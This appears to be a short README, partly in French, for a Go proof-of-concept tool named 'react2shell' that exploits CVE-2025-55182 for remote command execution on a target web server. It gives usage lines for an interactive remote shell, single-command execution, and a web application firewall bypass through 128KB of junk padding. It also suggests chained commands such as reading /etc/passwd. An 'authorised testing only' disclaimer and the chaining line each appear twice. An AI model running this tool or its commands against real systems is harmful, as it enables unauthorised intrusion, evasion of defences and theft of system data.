
PoC react2shell avec Go / CVE-2025-55182
CVE-2025-55182 PoC
# Interactive shell
./react2shell -u http://target:3000
# Single command
./react2shell -u http://target:3000 -c "id"
# WAF bypass (128KB junk data)
./react2shell -u http://target:3000 -waf 128
go build -o react2shell .
| Flag | Description |
|---|---|
-u | URL cible |
-c | Commande unique (optionnelle) |
-waf | Taille du bourrage pour contournement WAF en Ko (optionnel) |
; ou && pour enchaîner les commandes : cd /etc && cat passwdPour des tests de sécurité autorisés uniquement.
; ou && pour enchaîner les commandes : cd /etc && cat passwdPour des tests de sécurité autorisés uniquement.